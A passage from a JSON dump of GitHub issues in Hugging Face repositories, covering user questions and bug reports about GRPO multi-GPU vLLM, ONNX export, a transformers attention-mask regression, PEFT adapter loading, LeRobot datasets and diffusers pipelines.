    "body": "https://github.com/huggingface/trl/blob/e5ae703d352b29537159180087ef8bd4b41bf625/trl/trainer/grpo_trainer.py#L439-L461\n\nIn the current GRPO implementation, VLLM can only run on a single GPU, which becomes a performance bottleneck. For example, in an 8-GPU setup, the remaining 7 GPUs have to wait for 1 GPU to complete inference, and it also can't accommodate larger models.\n\nHow can we enable VLLM to run on multiple GPUs? The only concern is that we need to figure out a way to update the parameters across multiple GPUs each time the model is reloaded:\n\nhttps://github.com/huggingface/trl/blob/e5ae703d352b29537159180087ef8bd4b41bf625/trl/trainer/grpo_trainer.py#L624-L653",
    "url": "https://github.com/huggingface/trl/issues/2922",
    "state": "open",
    "labels": [
      "\u2728 enhancement",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-21T09:24:51Z",
    "updated_at": "2025-03-14T02:45:21Z",
    "user": "0x404"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 575,
    "title": "How to change the model weights in safetensors?",
    "body": "### Feature request\n\nFor example, I want to change some weight with shape [K,K,C] into [K,K,C/2], how can I achieve this hacking?\n\n### Motivation\n\nN/A\n\n### Your contribution\n\nN/A",
    "url": "https://github.com/huggingface/safetensors/issues/575",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-21T03:36:27Z",
    "updated_at": "2025-03-13T16:59:32Z",
    "user": "JulioZhao97"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1201,
    "title": "Unable to convert Janus models to ONNX",
    "body": "### Question\n\nI see that @xenova has successfully export Janus-1.3B and Janus-Pro-1B to ONNX, presumably using some version of scripts/convert.py. We are interested in exporting Janus-Pro-7B to ONNX as well, but have not been able to do so using this script (nor any other path). Attempting to convert either of the previous two models encounters the same errors, so hopefully whatever steps were taken to convert those will also enable the 7B version. \n\nThe initial error was: \n```\nValueError: The checkpoint you are trying to load has model type `multi_modality` but Transformers does not recognize this architecture. This could be because of an issue with the checkpoint, or because your version of Transformers is out of date.\n```\nThis was fixed by installing https://github.com/deepseek-ai/Janus and adding \n`from janus.models import MultiModalityCausalLM` \nto convert.py.\n\nThe error that I'm now stuck at is:\n```\nKeyError: \"Unknown task: any-to-any. Possible values are: `audio-classification` for AutoModelForAudioClassification, `audio-frame-classification` for AutoModelForAudioFrameClassification, `audio-xvector` for AutoModelForAudioXVector, `automatic-speech-recognition` for ('AutoModelForSpeechSeq2Seq', 'AutoModelForCTC'), `depth-estimation` for AutoModelForDepthEstimation, `feature-extraction` for AutoModel, `fill-mask` for AutoModelForMaskedLM, `image-classification` for AutoModelForImageClassification, `image-segmentation` for ('AutoModelForImageSegmentation', 'AutoModelForSemanticSegmentation'), `image-to-image` for AutoModelForImageToImage, `image-to-text` for AutoModelForVision2Seq, `mask-generation` for AutoModel, `masked-im` for AutoModelForMaskedImageModeling, `multiple-choice` for AutoModelForMultipleChoice, `object-detection` for AutoModelForObjectDetection, `question-answering` for AutoModelForQuestionAnswering, `semantic-segmentation` for AutoModelForSemanticSegmentation, `text-to-audio` for ('AutoModelForTextToSpectrogram', 'AutoModelForTextToWaveform'), `text-generation` for AutoModelForCausalLM, `text2text-generation` for AutoModelForSeq2SeqLM, `text-classification` for AutoModelForSequenceClassification, `token-classification` for AutoModelForTokenClassification, `zero-shot-image-classification` for AutoModelForZeroShotImageClassification, `zero-shot-object-detection` for AutoModelForZeroShotObjectDetection\"\n```\n\n\nI can't find anything about optimum supporting this task, so it is unclear to me how @xenova was able to get around this. \nAny insight or assistance would be greatly appreciated. ",
    "url": "https://github.com/huggingface/transformers.js/issues/1201",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-20T17:55:00Z",
    "updated_at": "2025-08-19T12:55:58Z",
    "user": "turneram"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7415,
    "title": "Shard Dataset at specific indices",
    "body": "I have a dataset of sequences, where each example in the sequence is a separate row in the dataset (similar to LeRobotDataset). When running `Dataset.save_to_disk` how can I provide indices where it's possible to shard the dataset such that no episode spans more than 1 shard. Consequently, when I run `Dataset.load_from_disk`, how can I load just a subset of the shards to save memory and time on different ranks?\n\nI guess an alternative to this would be, given a loaded `Dataset`, how can I run `Dataset.shard` such that sharding doesn't split any episode across shards?",
    "url": "https://github.com/huggingface/datasets/issues/7415",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T10:43:10Z",
    "updated_at": "2025-02-24T11:06:45Z",
    "comments": 3,
    "user": "nikonikolov"
  },
  {
    "repo": "huggingface/trl",
    "number": 2913,
    "title": "How to specify the GPU used by vllm",
    "body": "https://github.com/huggingface/trl/blob/a92e00e810762548787fadd5c4a5e6fc13a4928a/trl/trainer/grpo_trainer.py#L392\nI have an 8-GPUs server, of which only the last two GPUs are available, and I set CUDA_VISIBLE_DEVICE=6,7, the value of torch.cuda.device_count() is 2. I want to load vllm into GPU 6, and I set vllm_device=cuda:6, but this line of code keeps giving an ValueError. What should I do?",
    "url": "https://github.com/huggingface/trl/issues/2913",
    "state": "closed",
    "labels": [
      "\u2753 question"
    ],
    "created_at": "2025-02-20T10:32:30Z",
    "updated_at": "2025-02-21T03:14:13Z",
    "user": "xiaolizh1"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 381,
    "title": "how to set sampling parameters when do evaluation",
    "body": "As you said you use greedy decoding to reproduce deepseek's evaluation results, And I get different score, there may be something not  aligning. So I want to know how to set the sampling parameters and how to see them when I use the 'evaluate.py' to do evaluation. ",
    "url": "https://github.com/huggingface/open-r1/issues/381",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T08:41:26Z",
    "updated_at": "2025-02-24T06:57:59Z",
    "user": "ItGirls"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 380,
    "title": "How to set cuda device for your Data generation pipline",
    "body": "Hi author, thanks for your work.\nWhen I use your pipline to generate data set (deepseek-ai/DeepSeek-R1-Distill-Qwen-7B)\nI find I can not set device with os.environ\n\n![Image](https://github.com/user-attachments/assets/ff7bc85f-63a0-4618-80f0-f0516081e7ec)\n\nIt is actually always on the cude:0, how can I set it correctl? Thank you!",
    "url": "https://github.com/huggingface/open-r1/issues/380",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T07:06:44Z",
    "updated_at": "2025-02-20T07:06:44Z",
    "user": "Aristo23333"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36293,
    "title": "Bug in v4.49 where the attention mask is ignored during generation (t5-small)",
    "body": "### System Info\n\nHi all!\n\nFirst, thank you very much for your hard work and making these features avalible.\n\nI'm seeing a bug after updating to v4.49 where the output changes even though the attention mask should be masking padded values. Below is a script to reproduce the error.\n\nIt will tokenize two prompts, and then call `.generate` on the shorter prompt while trying different slices of the padded `input_ids` and padded `attention_mask`. At some point, the generated response will change for v4.49 but not v4.48.\n\n\nEnviroment information\n```\n- `transformers` version: 4.49.0\n- Platform: macOS-15.3-arm64-arm-64bit\n- Python version: 3.10.13\n- Huggingface_hub version: 0.29.0\n- Safetensors version: 0.5.2\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0 (False)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n```\n\noutput of `uv pip compile requirements.in`\n```\ntransformers==4.48.0         # change this to 4.49.0 to reproduce the error\n\nasttokens==3.0.0\ncertifi==2025.1.31\ncharset-normalizer==3.4.1\ndecorator==5.1.1\nexceptiongroup==1.2.2\nexecuting==2.2.0\nfilelock==3.17.0\nfsspec==2025.2.0\nhuggingface-hub==0.29.0\nidna==3.10\nipython==8.32.0\njedi==0.19.2\njinja2==3.1.5\nmarkupsafe==3.0.2\nmatplotlib-inline==0.1.7\nmpmath==1.3.0\nnetworkx==3.4.2\nnumpy==2.2.3\npackaging==24.2\nparso==0.8.4\npexpect==4.9.0\nprompt-toolkit==3.0.50\nptyprocess==0.7.0\npure-eval==0.2.3\npygments==2.19.1\npyyaml==6.0.2\nregex==2024.11.6\nrequests==2.32.3\nsafetensors==0.5.2\nsentencepiece==0.2.0\nstack-data==0.6.3\nsympy==1.13.1\ntokenizers==0.21.0\ntorch==2.6.0\ntqdm==4.67.1\ntraitlets==5.14.3\ntyping-extensions==4.12.2\nurllib3==2.3.0\nwcwidth==0.2.13\n```\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer, GenerationConfig\n\n\nmodel = AutoModelForSeq2SeqLM.from_pretrained(\"t5-small\")\ntokenizer = AutoTokenizer.from_pretrained(\"t5-small\")\n\ncfg = GenerationConfig(\n    max_new_tokens=512,\n    do_sample=False,\n    use_cache=True,    # same behavior with use_cache=False\n)\n\n\nshortprompt = (\"summarize: Transformers v4.49 appears to have a bug where .generate stops respecting \"\n               \"the attention_mask after some number of tokens.\")\nlongprompt = (\"summarize: I enjoy walking with my cute dog, especially in the early mornings \"\n              \"when the air is crisp and the streets are quiet. Watching my dog happily trot along, \"\n              \"always brings a smile to my face.\")\n\n# ---\nprint(\"# Single prompt ---\")\ninputs = tokenizer(\n    [shortprompt], return_tensors=\"pt\", padding=True\n)\n\noutputs = model.generate(**inputs, generation_config=cfg)\n\nexpected = tokenizer.batch_decode(outputs, skip_special_tokens=True)[0]\nprint(f\"short prompt: '{expected}'\")\nprint()\n\n\n# ---\nprint(\"# Double prompt ---\")\ninputs = tokenizer(\n    [shortprompt, longprompt], return_tensors=\"pt\", padding=True\n)\n\noutputs = model.generate(**inputs, generation_config=cfg)\n\ntext = tokenizer.batch_decode(outputs, skip_special_tokens=True)\nprint(f\"short prompt: '{text[0]}'\")\nprint(f\"long prompt: '{text[1]}'\")\nprint()\n\n# ---\nprint(\"# Single shortprompt with mask ---\")\ndef run_sliced_input(slice_, show_text=False):\n    shortprompt_tokens = inputs.input_ids[0:1, slice_]\n    shortprompt_mask = inputs.attention_mask[0:1, slice_]\n\n    outputs = model.generate(inputs=shortprompt_tokens, attention_mask=shortprompt_mask, generation_config=cfg)\n    text = tokenizer.batch_decode(outputs, skip_special_tokens=True)[0]\n    if show_text:\n        print(f\"'{text}'\")\n    return text != expected\n\n# run a bisect search to find the first slice that fails\nimport bisect\nstart = inputs.attention_mask[0].sum().item()\nfull_range = inputs.attention_mask.size(1)\nends = range(start, full_range)\nprint(f\"searching in range {start} to {full_range}\")\n\nfirst_failure = start + bisect.bisect_left(\n    [slice(None, end) for end in ends], True, key=run_sliced_input\n)\nif first_failure == full_range:\n    print(\"No failure found in the full range!\")\nelse:\n    print(f\"First failing slice: {first_failure}\")\n\n    print(f\"Output with slice at {first_failure-1}: \", end=\"\")\n    run_sliced_input(slice(None, first_failure-1), show_text=True)\n    print(f\"Output with slice at {first_failure}: \", end=\"\")\n    run_sliced_input(slice(None, first_failure), show_text=True)\n\n```\n\n### Expected behavior\n\nversion 4.48\n```\n# Single prompt ---\nshort prompt: 'v4.49 appears to have a bug where.generate stops respecting the attention_mask after some tokens.'\n\n# Double prompt ---\nshort prompt: 'v4.49 appears to have a bug w",
    "url": "https://github.com/huggingface/transformers/issues/36293",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-20T02:16:23Z",
    "updated_at": "2025-02-20T16:28:11Z",
    "user": "bdhammel"
  },
  {
    "repo": "huggingface/optimum-nvidia",
    "number": 176,
    "title": "How to run whisper after #133",
    "body": "I see that previously, whisper could be run as follows: [https://github.com/huggingface/optimum-nvidia/blob/whisper-inference/examples/automatic-speech-recognition/whisper.py](https://github.com/huggingface/optimum-nvidia/blob/whisper-inference/examples/automatic-speech-recognition/whisper.py)\n\n\nBut after #133 the code has been significantly refactored. Is there any documentation that shows how to properly run whisper with a tensorRT backend?\n\n```python\nfrom optimum.nvidia.pipelines import pipeline\nasr = pipeline(\"automatic-speech-recognition\", model=\"openai/whisper-base\", device=device)\n> NotImplementedError: Model type whisper is not currently supported\n```\n\n```python\nfrom optimum.nvidia.models.whisper import WhisperForConditionalGeneration\nmodel = WhisperForConditionalGeneration.from_pretrained(\"openai/whisper-base\", torch_dtype=torch_dtype)\n> AttributeError: type object 'WhisperForConditionalGeneration' has no attribute 'from_pretrained'\n```\n",
    "url": "https://github.com/huggingface/optimum-nvidia/issues/176",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T17:45:01Z",
    "updated_at": "2025-02-19T17:45:01Z",
    "user": "huggingfacename"
  },
  {
    "repo": "huggingface/peft",
    "number": 2388,
    "title": "ValueError: Target module Qwen2_5_VisionTransformerPretrainedModel is not supported.",
    "body": "## Context\nI'm finetuning the Qwen2.5-Vl model with swift for data extraction using LoRA. I'm not sure what is the correct way to save and upload the adapter and be able to recharge it correctly.\nIn short, I followed these steps\n```python\n# load model\nmodel, processor = get_model_tokenizer(\n    'Qwen/Qwen2.5-VL-3B-Instruct',\n    torch_dtype=torch.bfloat16,\n    use_hf=True,\n    attn_impl=\"flash_attn\",\n)\n# get lora \n...\nmodel_arch = get_model_arch(model.model_meta.model_arch)\nlora_config = LoraConfig(\n    task_type='CAUSAL_LM',\n    r=4,\n    lora_alpha=8,\n    lora_dropout=0.05,\n    use_rslora=True,\n    target_modules=get_multimodal_target_regex(\n      model_arch,\n      freeze_llm=False,\n      freeze_vit=False,\n      freeze_aligner=True\n    ),\n)\nmodel = Swift.prepare_model(model, lora_config)\n# train config e run\n...\ntrainer = Seq2SeqTrainer(\n    model=model,\n    args=training_args,\n    data_collator=template.data_collator,\n    train_dataset=train_dataset,\n    eval_dataset=val_dataset,\n    template=template,\n    callbacks= [\n        EarlyStoppingCallback(\n            early_stopping_patience=6,\n            early_stopping_threshold=0.001\n        )\n    ]\n)\nstats = trainer.train()\n# push adapter\nmodel.push_to_hub(f\"tech4humans/{model_name}\", private=True)\n```\ndebugging the peft model was loaded with the class `PeftModelForCausalLM`.\n\n## Problem \n Then after I tried to recharge the adapter and I get an error with peft\n```python\nfrom transformers import Qwen2_5_VLForConditionalGeneration\nmodel = Qwen2_5_VLForConditionalGeneration.from_pretrained(\"Qwen/Qwen2.5-VL-3B-Instruct\", device_map=\"auto\") \nmodel.load_adapter(\"tech4humans/Qwen2.5-VL-3B-Instruct-r4-tuned\")\n``` \n```python\n/usr/local/lib/python3.10/dist-packages/peft/tuners/lora/model.py in _create_new_module(lora_config, adapter_name, target, **kwargs)\n    345         if new_module is None:\n    346             # no module could be matched\n--> 347             raise ValueError(\n    348                 f\"Target module {target} is not supported. Currently, only the following modules are supported: \"\n    349                 \"`torch.nn.Linear`, `torch.nn.Embedding`, `torch.nn.Conv1d`, `torch.nn.Conv2d`, `torch.nn.Conv3d`, \".\n\nValueError: Target module Qwen2_5_VisionTransformerPretrainedModel(\n  (patch_embed): Qwen2_5_VisionPatchEmbed(\n    (proj): Conv3d(3, 1280, kernel_size=(2, 14, 14), stride=(2, 14, 14), bias=False)\n  )\n  (rotary_pos_emb): Qwen2_5_VisionRotaryEmbedding()\n  (blocks): ModuleList(\n    (0-31): 32 x Qwen2_5_VLVisionBlock(\n      (norm1): Qwen2RMSNorm((1280,), eps=1e-06)\n      (norm2): Qwen2RMSNorm((1280,), eps=1e-06)\n      (attn): Qwen2_5_VLVisionSdpaAttention(\n        (qkv): Linear(in_features=1280, out_features=3840, bias=True)\n        (proj): Linear(in_features=1280, out_features=1280, bias=True)\n      )\n      (mlp): Qwen2_5_VLMLP(\n        (gate_proj): Linear(in_features=1280, out_features=3420, bias=True)\n        (up_proj): Linear(in_features=1280, out_features=3420, bias=True)\n        (down_proj): Linear(in_features=3420, out_features=1280, bias=True)\n        (act_fn): SiLU()\n      )\n    )\n  )\n  (merger): Qwen2_5_VLPatchMerger(\n    (ln_q): Qwen2RMSNorm((1280,), eps=1e-06)\n    (mlp): Sequential(\n      (0): Linear(in_features=5120, out_features=5120, bias=True)\n      (1): GELU(approximate='none')\n      (2): Linear(in_features=5120, out_features=2048, bias=True)\n    )\n  )\n) is not supported. Currently, only the following modules are supported: `torch.nn.Linear`, `torch.nn.Embedding`, `torch.nn.Conv1d`, `torch.nn.Conv2d`, `torch.nn.Conv3d`, `transformers.pytorch_utils.Conv1D`, `torch.nn.MultiheadAttention.`.\n```\n\n## Sytem info\n```\ntransformers 4.50.0.dev0\npeft 0.14.1.dev0\nms-swift 3.2.0.dev0\nPython 3.10.12\nCUDA Version: 12.6\n```\nAm I missing something or doing something wrong? Any pointers would be appreciated. Thanks!",
    "url": "https://github.com/huggingface/peft/issues/2388",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-19T15:09:17Z",
    "updated_at": "2025-04-09T16:23:53Z",
    "comments": 8,
    "user": "samuellimabraz"
  },
  {
    "repo": "huggingface/trl",
    "number": 2905,
    "title": "How to use GRPOTrainer to train a LLM for code generation? What is the format of the dataset?",
    "body": "",
    "url": "https://github.com/huggingface/trl/issues/2905",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T12:38:13Z",
    "updated_at": "2025-02-19T12:38:13Z",
    "user": "xiangxinhello"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 370,
    "title": "how to train grpo on 2 nodes(16gpus)",
    "body": "how to train grpo on 2 nodes(16gpus)? 10000 thanks for giving a successful example.",
    "url": "https://github.com/huggingface/open-r1/issues/370",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-19T09:15:14Z",
    "updated_at": "2025-03-26T11:36:03Z",
    "user": "glennccc"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 267,
    "title": "How to save the best performing checkpoint during LoRA fine-tuning on Hunyuan Video?",
    "body": "In the HunyuanVideo training scripts, we can save checkpoints every 500 steps by passing `--checkpointing_steps 500`. The final model is saved through the following code:\n\n```python\nif accelerator.is_main_process:\n    transformer = unwrap_model(accelerator, self.transformer)\n\n    if self.args.training_type == \"lora\":\n        transformer_lora_layers = get_peft_model_state_dict(transformer)\n\n        self.model_config[\"pipeline_cls\"].save_lora_weights(\n            save_directory=self.args.output_dir,\n            transformer_lora_layers=transformer_lora_layers,\n        )\n    else:\n        transformer.save_pretrained(os.path.join(self.args.output_dir, \"transformer\"))\n```\n(Reference: https://github.com/a-r-r-o-w/finetrainers/blob/4bb10c62324aef4fbac85bb381acb9f6f39a5076/finetrainers/trainer.py#L837C1-L848C95)\n\nMy question is: How can I ensure that I save the best performing model during LoRA fine-tuning? The final saved model might not be the best, as the loss could fluctuate during training. The same applies to intermediate checkpoints. Is there a recommended approach for tracking and saving the best-performing model?",
    "url": "https://github.com/huggingface/finetrainers/issues/267",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T07:49:11Z",
    "updated_at": "2025-02-21T01:39:30Z",
    "user": "dingangui"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 748,
    "title": "[pi0] confusion about the state embedding dimension in `embed_suffix`",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-5.14.0-284.86.1.el9_2.x86_64-x86_64-with-glibc2.35\n- Python version: 3.11.11\n- Huggingface_hub version: 0.28.1\n- Dataset version: 3.2.0\n- Numpy version: 1.26.4\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Cuda version: 12040\n- Using GPU in script?: Yes\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIn the model definition of `modeling_pi0.py`,[ line 567](https://github.com/huggingface/lerobot/blob/fe483b1d0d4ad8506f61924d905943eaa6d3ece0/lerobot/common/policies/pi0/modeling_pi0.py#L567), we see that\n\n```\n# Embed state\nstate_emb = self.state_proj(state)\nstate_emb = state_emb.to(dtype=torch.bfloat16)\nembs.append(state_emb[:, None, :])\nbsize = state_emb.shape[0]\ndtype = state_emb.dtype\ndevice = state_emb.device\n```\n\nWe see that the state embedding dimension is bumped up at the 1st dimension.\n\nThe problem is, models like pi0 usually use datasets that have `n_obs_steps.`, which is the default of LeRobot's own datasets as well. For example, if I use the `pusht` dataset as specified in this LeRobot example [script](https://github.com/huggingface/lerobot/blob/main/examples/3_train_policy.py), we see that the dimension of the dataset looks something like this\n```\nimage shape torch.Size([64, 2, 3, 96, 96])\nstate shape torch.Size([64, 2, 2])\naction shape torch.Size([64, 16, 2])\n```\n\nThe first 2 in the dimensions of image and state come from the fact that the dataset gives you two frames of the past in one batch. The 16 in action comes from the fact that diffusion policy has an action horizon of 16 frames in the future.\n\nNow, if we train on dataset like this or any similar dataset, it would have a dimension mismatch in `embed_suffix` because it would bump the state_embedding and give you something like\n```\nRuntimeError: Tensors must have same number of dimensions: got 4 and 3\n```\n\nFor pi0 it's more or less okay, because the default n_obs_steps is usually 1, so you can squeeze out the 1st dimension of state, but this current way doesn't seem very expendable in the future, and also not consistent with LeRobot's usual dataset format.\n\n### Expected behavior\n\nI would like to hear some reasoning behind the design choice like this so I can know if I am misunderstanding something. \n\nThank you very much in advance!",
    "url": "https://github.com/huggingface/lerobot/issues/748",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-02-19T03:33:01Z",
    "updated_at": "2025-10-20T02:31:45Z",
    "user": "IrvingF7"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1198,
    "title": "whisper: how to get streaming word level timestamps? (automatic-speech-recognition)",
    "body": "### Question\n\n## Goal\n- streaming\n- word level timestamps\n\n## Issue\n`on_chunk_start` / `on_chunk_end` are not called when using `return_timestamps: \"word\"`. \nThese callbacks only provide timestamps with `return_timestamps: true`\n\nI also tried to decode tokens, as I\u2019ve seen it in the demo, but that uses callbacks that no longer exist (e.g. `chunk_callback(chunk)` and `callback_function(item)`)\n\n## Setup\n\n\n```ts\nconst transcriber = await pipeline(\n  \"automatic-speech-recognition\",\n  \"Xenova/whisper-tiny\",\n  {\n    device: \"webgpu\",\n   }\n);\n```\n\n\n```ts\ntoken_callback_function: (tokens) => {\n  const { feature_extractor } = transcriber.processor;\n  const { config: modelConfig } = transcriber.model;\n  \n  const time_precision = feature_extractor.config.chunk_length / modelConfig.max_source_positions;\n\n  if (tokens) {\n    const data = transcriber.tokenizer._decode_asr(\n      [{ tokens, finalised: false }],\n      {\n        time_precision,\n        return_timestamps: true,\n        force_full_sequences: false,\n      }\n    );\n\n    console.log(\"data\", data);\n  }\n};\n```\n\nDecoding works, but timestamps are null.\n\n\"Image\"",
    "url": "https://github.com/huggingface/transformers.js/issues/1198",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-18T15:29:42Z",
    "updated_at": "2025-02-20T04:45:48Z",
    "user": "getflourish"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10817,
    "title": "auto_pipeline missing SD3 contol nets",
    "body": "### Describe the bug\n\nHey, auto_pipeline seesm to be missing the control nets variants for SD3\n\nvenv\\Lib\\site-packages\\diffusers\\pipelines\\auto_pipeline.py\n\n### Reproduction\n\nLoad an sd3 model checkpoint with a controlnet loading any of the auto pipes you will just get the none control net variations as its not set in the configuration.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.2\n- Platform: Windows-10-10.0.19045-SP0\n- Running on Google Colab?: No\n- Python version: 3.12.7\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.27.1\n- Transformers version: 4.48.0\n- Accelerate version: 1.2.1\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.2\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 3080 Ti, 12288 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10817",
    "state": "closed",
    "labels": [
      "bug",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-02-18T12:54:40Z",
    "updated_at": "2025-02-24T16:21:03Z",
    "comments": 3,
    "user": "JoeGaffney"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 746,
    "title": "How should I run the model on my own datasets in different envs which is not clearly mentioned in the README?",
    "body": "I want to run the diffusion model on my own real world arms datasets, which are different from the example env and input format in observation and action dims.\n\nI've seem some yaml files to store these parameters in earlier version of the repo, but I can't find it in the newest version of the repo. So should I write this params myself in some yaml-like or json-like files or there are some new ways to solve these problems. \n\nThis is my first issue in github, so the format may be informal, but I'm really eager for the answers. \nThank you for your answers!!!",
    "url": "https://github.com/huggingface/lerobot/issues/746",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-18T12:33:07Z",
    "updated_at": "2025-10-19T02:32:17Z",
    "user": "shi-akihi"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 741,
    "title": "Inquiry on Implementing NoMaD Model (Transformers and Diffusion Policy)",
    "body": "I am planning to implement the NoMaD model, which combines Transformers and Diffusion Policy, within the LeRobot project. Before proceeding, I wanted to check if anyone else is currently working on or has already started implementing this model.\n\nFor reference, here are the relevant resources:\n\nWebsite: https://general-navigation-models.github.io/nomad/\nPaper: https://arxiv.org/pdf/2310.07896\n\nPlease let me know if there is ongoing work related to this model or if anyone is interested in collaborating.",
    "url": "https://github.com/huggingface/lerobot/issues/741",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-17T19:57:23Z",
    "updated_at": "2025-10-08T20:56:42Z",
    "user": "vaishanth-rmrj"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 738,
    "title": "convert simulation data of insertion from v1 to v2",
    "body": "I cannot convert using the file (datasets/v2/convert_dataset_v1_to_v2.py) which requires robotconfig which I don't have\n\nI just want to convert your data on lerobot/act_aloha_sim_transfer_cube_human",
    "url": "https://github.com/huggingface/lerobot/issues/738",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-17T11:00:38Z",
    "updated_at": "2025-10-08T08:59:52Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 340,
    "title": "About the data using in sft,  how to set SFTConfig.dataset_text_field?",
    "body": "how to use the HuggingFaceH4/Bespoke-Stratos-17k in sft.\n\nI find there are two items in the data, \"system\" and \"conversations\". So, when I download this data and to finetune a LLM such as Qwen2.5-1.5B-Instruct, how to organize the data,  in trl SFTConfig has a default parameter named dataset_text_field, it's default value is \"text\" which is not exists in such data, I mean Bespoke-Stratos-17k .",
    "url": "https://github.com/huggingface/open-r1/issues/340",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-17T07:06:14Z",
    "updated_at": "2025-02-20T08:59:49Z",
    "user": "ItGirls"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 264,
    "title": "How to set --precompute_conditions for CogvideoI2V training?",
    "body": "cause i don't find this feature in Image2Video training.\ndoes it exist?",
    "url": "https://github.com/huggingface/finetrainers/issues/264",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-17T06:00:50Z",
    "updated_at": "2025-03-05T03:49:05Z",
    "user": "BlackTea-c"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10805,
    "title": "is there inpainiting dataset and parameters example provided for xl training?",
    "body": "**What API design would you like to have changed or added to the library? Why?**\n\n**What use case would this enable or better enable? Can you give us a code example?**\n\nHi patil-suraj @patil-suraj , appreciated for the convenient script ! Is there any code example and dataset example to run the script: https://github.com/huggingface/diffusers/blob/inpainting-script/examples/inpainting/train_inpainting_sdxl.py ?",
    "url": "https://github.com/huggingface/diffusers/issues/10805",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-17T01:56:14Z",
    "updated_at": "2025-02-17T02:03:09Z",
    "comments": 2,
    "user": "fire2323"
  },
  {
    "repo": "huggingface/gsplat.js",
    "number": 109,
    "title": "Info request: How to update individual points in splat?",
    "body": "I would like to update position of individual points dynamically in order to create animations and effects.\nWhat would be the optimal way to do it?\n",
    "url": "https://github.com/huggingface/gsplat.js/issues/109",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-16T18:11:14Z",
    "updated_at": "2025-02-16T18:43:23Z",
    "user": "sjovanovic"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10803,
    "title": "SANARubber a flexible version of SANA with i2i and multidiffusion/regional diffusion",
    "body": "### Model/Pipeline/Scheduler description\n\nI made a pipeline that is as reliable as the basic SANA pipeline but more flexible by making it run an array of functions which runs everything the og pipeline does. this can make easy combinations if necessary. \n\nhere's the link, enjoy\nhttps://github.com/alexblattner/SANARubber\n\nexample of multidiffusion in sana:\n['bright moon','red','blue','green','black'] (first prompt is applied in the background\n[\"0:0-512:512\",\"512:0-1024:512\",\"512:1024-1024:1024\",\"0:512-512:1024\"] those are the areas of the rest of the prompts\n[.7,.7,.7,.7] those are the strengths of the areas applied with their prompts\n\n![Image](https://github.com/user-attachments/assets/98e207f5-a229-4a91-9349-6824095bc50c)\n\nagain with i2i at stength .5 and the same settings as before (mild changes only):\n\n![Image](https://github.com/user-attachments/assets/65329495-ea25-42e4-b8f7-d4fbc4be8a19)\n\n\n\nENJOY!\n\n### Open source status\n\n- [x] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10803",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-16T15:08:11Z",
    "updated_at": "2025-03-19T15:03:31Z",
    "comments": 1,
